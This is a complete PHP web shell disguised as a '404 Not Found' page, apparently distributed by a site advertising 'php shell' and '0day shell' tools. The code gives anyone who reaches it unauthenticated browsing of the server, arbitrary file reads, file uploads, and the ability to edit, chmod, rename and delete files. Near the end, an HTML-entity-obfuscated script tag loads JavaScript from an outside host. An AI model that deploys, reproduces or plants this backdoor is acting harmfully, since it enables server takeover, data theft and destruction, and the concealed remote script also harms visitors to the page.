1. <?php
2. set_time_limit(0);
3. error_reporting(0);
4.  
5. if(get_magic_quotes_gpc()){
6. foreach($_POST as $key=>$value){
7. $_POST[$key] = stripslashes($value);
8. }
9. }
10. echo '<!DOCTYPE HTML>
11. <HTML>
12. <HEAD>
13. <link href="" rel="stylesheet" type="text/css">
14. <title>404 Not Found</title>
15. <style>
16. body{
17. font-family: "Racing Sans One", cursive;
18. background-color: #e6e6e6;
19. text-shadow:0px 0px 1px #757575;
20. }
21. #content tr:hover{
22. background-color: #636263;
23. text-shadow:0px 0px 10px #fff;
24. }
25. #content .first{
26. background-color: silver;
27. }
28. #content .first:hover{
29. background-color: silver;
30. text-shadow:0px 0px 1px #757575;
31. }
32. table{
33. border: 1px #000000 dotted;
34. }
35. H1{
36. font-family: "Rye", cursive;
37. }
38. a{
39. color: #000;
40. text-decoration: none;
41. }
42. a:hover{
43. color: #fff;
44. text-shadow:0px 0px 10px #ffffff;
45. }
46. input,select,textarea{
47. border: 1px #000000 solid;
48. -moz-border-radius: 5px;
49. -webkit-border-radius:5px;
50. border-radius:5px;
51. }
52. </style>
53. </HEAD>
54. <BODY>
55. <H1><center>[#] 404 NOT FOUND </center></H1>
56. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
57. <tr><td>Current Path : ';
58. if(isset($_GET['path'])){
59. $path = $_GET['path'];
60. }else{
61. $path = getcwd();
62. }
63. $path = str_replace('\\','/',$path);
64. $paths = explode('/',$path);
65.  
66. foreach($paths as $id=>$pat){
67. if($pat == '' && $id == 0){
68. $a = true;
69. echo '<a href="?path=/">/</a>';
70. continue;
71. }
72. if($pat == '') continue;
73. echo '<a href="?path=';
74. for($i=0;$i<=$id;$i++){
75. echo "$paths[$i]";
76. if($i != $id) echo "/";
77. }
78. echo '">'.$pat.'</a>/';
79. }
80. echo '</td></tr><tr><td>';
81. if(isset($_FILES['file'])){
82. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
83. echo '<font color="green">File Upload Done Bitch ~_^ .</font><br />';
84. }else{
85. echo '<font color="red">File Upload Error ~_~.</font><br />';
86. }
87. }
88. echo '<form enctype="multipart/form-data" method="POST">
89. Upload File : <input type="file" name="file" />
90. <input type="submit" value="upload" />
91. </form>
92. </td></tr>';
93. if(isset($_GET['filesrc'])){
94. echo "<tr><td>Current File : ";
95. echo $_GET['filesrc'];
96. echo '</tr></td></table><br />';
97. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
98. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
99. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
100. if($_POST['opt'] == 'chmod'){
101. if(isset($_POST['perm'])){
102. if(chmod($_POST['path'],$_POST['perm'])){
103. echo '<font color="green">Change Permission Done.</font><br />';
104. }else{
105. echo '<font color="red">Change Permission Error.</font><br />';
106. }
107. }
108. echo '<form method="POST">
109. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
110. <input type="hidden" name="path" value="'.$_POST['path'].'">
111. <input type="hidden" name="opt" value="chmod">
112. <input type="submit" value="Go" />
113. </form>';
114. }elseif($_POST['opt'] == 'rename'){
115. if(isset($_POST['newname'])){
116. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
117. echo '<font color="green">Change Name Done.</font><br />';
118. }else{
119. echo '<font color="red">Change Name Error.</font><br />';
120. }
121. $_POST['name'] = $_POST['newname'];
122. }
123. echo '<form method="POST">
124. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
125. <input type="hidden" name="path" value="'.$_POST['path'].'">
126. <input type="hidden" name="opt" value="rename">
127. <input type="submit" value="Go" />
128. </form>';
129. }elseif($_POST['opt'] == 'edit'){
130. if(isset($_POST['src'])){
131. $fp = fopen($_POST['path'],'w');
132. if(fwrite($fp,$_POST['src'])){
133. echo '<font color="green">Edit File Done ~_^.</font><br />';
134. }else{
135. echo '<font color="red">Edit File Error ~_~.</font><br />';
136. }
137. fclose($fp);
138. }
139. echo '<form method="POST">
140. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
141. <input type="hidden" name="path" value="'.$_POST['path'].'">
142. <input type="hidden" name="opt" value="edit">
143. <input type="submit" value="Go" />
144. </form>';
145. }
146. echo '</center>';
147. }else{
148. echo '</table><br /><center>';
149. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
150. if($_POST['type'] == 'dir'){
151. if(rmdir($_POST['path'])){
152. echo '<font color="green">Delete Dir Done.</font><br />';
153. }else{
154. echo '<font color="red">Delete Dir Error.</font><br />';
155. }
156. }elseif($_POST['type'] == 'file'){
157. if(unlink($_POST['path'])){
158. echo '<font color="green">Delete File Done.</font><br />';
159. }else{
160. echo '<font color="red">Delete File Error.</font><br />';
161. }
162. }
163. }
164. echo '</center>';
165. $scandir = scandir($path);
166. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
167. <tr class="first">
168. <td><center>Name</center></td>
169. <td><center>Size</center></td>
170. <td><center>Permissions</center></td>
171. <td><center>Options</center></td>
172. </tr>';
173.  
174. foreach($scandir as $dir){
175. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
176. echo "<tr>
177. <td><a href=\"?path=$path/$dir\">$dir</a></td>
178. <td><center>--</center></td>
179. <td><center>";
180. if(is_writable("$path/$dir")) echo '<font color="green">';
181. elseif(!is_readable("$path/$dir")) echo '<font color="red">';
182. echo perms("$path/$dir");
183. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
184.  
185. echo "</center></td>
186. <td><center><form method=\"POST\" action=\"?option&path=$path\">
187. <select name=\"opt\">
188. <option value=\"\"></option>
189. <option value=\"delete\">Delete</option>
190. <option value=\"chmod\">Chmod</option>
191. <option value=\"rename\">Rename</option>
192. </select>
193. <input type=\"hidden\" name=\"type\" value=\"dir\">
194. <input type=\"hidden\" name=\"name\" value=\"$dir\">
195. <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
196. <input type=\"submit\" value=\">\" />
197. </form></center></td>
198. </tr>";
199. }
200. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
201. foreach($scandir as $file){
202. if(!is_file("$path/$file")) continue;
203. $size = filesize("$path/$file")/1024;
204. $size = round($size,3);
205. if($size >= 1024){
206. $size = round($size/1024,2).' MB';
207. }else{
208. $size = $size.' KB';
209. }
210.  
211. echo "<tr>
212. <td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
213. <td><center>".$size."</center></td>
214. <td><center>";
215. if(is_writable("$path/$file")) echo '<font color="green">';
216. elseif(!is_readable("$path/$file")) echo '<font color="red">';
217. echo perms("$path/$file");
218. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
219. echo "</center></td>
220. <td><center><form method=\"POST\" action=\"?option&path=$path\">
221. <select name=\"opt\">
222. <option value=\"\"></option>
223. <option value=\"delete\">Delete</option>
224. <option value=\"chmod\">Chmod</option>
225. <option value=\"rename\">Rename</option>
226. <option value=\"edit\">Edit</option>
227. </select>
228. <input type=\"hidden\" name=\"type\" value=\"file\">
229. <input type=\"hidden\" name=\"name\" value=\"$file\">
230. <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
231. <input type=\"submit\" value=\">\" />
232. </form></center></td>
233. </tr>";
234. }
235. echo '</table>
236. </div>';
237. }
238. echo '<br />404<font color="red">1.0</font> NOT <font color="red">FOUND</font>
239. <SCRIPT SRC=&#x68&#x74&#x74&#x70&#x3a&#x2f&#x2f&#x77&#x77&#x77&#x2e&#x6c&#x6f&#x63&#x61&#x6c&#x72&#x6f&#x6f&#x74&#x2e&#x6e&#x65&#x74&#x2f&#x69&#x62&#x6e&#x65&#x6c&#x65&#x72&#x2f&#x79&#x61&#x7a&#x2e&#x6a&#x73></SCRIPT>
240. </BODY>
241. </HTML>';
242. function perms($file){
243. $perms = fileperms($file);
244.  
245. if (($perms & 0xC000) == 0xC000) {
246. // Socket
247. $info = 's';
248. } elseif (($perms & 0xA000) == 0xA000) {
249. // Symbolic Link
250. $info = 'l';
251. } elseif (($perms & 0x8000) == 0x8000) {
252. // Regular
253. $info = '-';
254. } elseif (($perms & 0x6000) == 0x6000) {
255. // Block special
256. $info = 'b';
257. } elseif (($perms & 0x4000) == 0x4000) {
258. // Directory
259. $info = 'd';
260. } elseif (($perms & 0x2000) == 0x2000) {
261. // Character special
262. $info = 'c';
263. } elseif (($perms & 0x1000) == 0x1000) {
264. // FIFO pipe
265. $info = 'p';
266. } else {
267. // Unknown
268. $info = 'u';
269. }
270.  
271. // Owner
272. $info .= (($perms & 0x0100) ? 'r' : '-');
273. $info .= (($perms & 0x0080) ? 'w' : '-');
274. $info .= (($perms & 0x0040) ?
275. (($perms & 0x0800) ? 's' : 'x' ) :
276. (($perms & 0x0800) ? 'S' : '-'));
277.  
278. // Group
279. $info .= (($perms & 0x0020) ? 'r' : '-');
280. $info .= (($perms & 0x0010) ? 'w' : '-');
281. $info .= (($perms & 0x0008) ?
282. (($perms & 0x0400) ? 's' : 'x' ) :
283. (($perms & 0x0400) ? 'S' : '-'));
284.  
285. // World
286. $info .= (($perms & 0x0004) ? 'r' : '-');
287. $info .= (($perms & 0x0002) ? 'w' : '-');
288. $info .= (($perms & 0x0001) ?
289. (($perms & 0x0200) ? 't' : 'x' ) :
290. (($perms & 0x0200) ? 'T' : '-'));
291.  
292. return $info;
293. }
294. ?>
295.  
296.  
297. <table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc></div></div><div align=center id='n'><font face=Verdana size=-2><b>o---[ php shell | 0day shell | <a href=http://localroot.net>localroot.net</a> | <a href=http://localroot.net>localroot.net</a> | <a href=http://www.localroot.net>LocalRoot</a> | php exploit ]---o</b></font></div></td></tr></table>
298.  
299.  
300.  
301.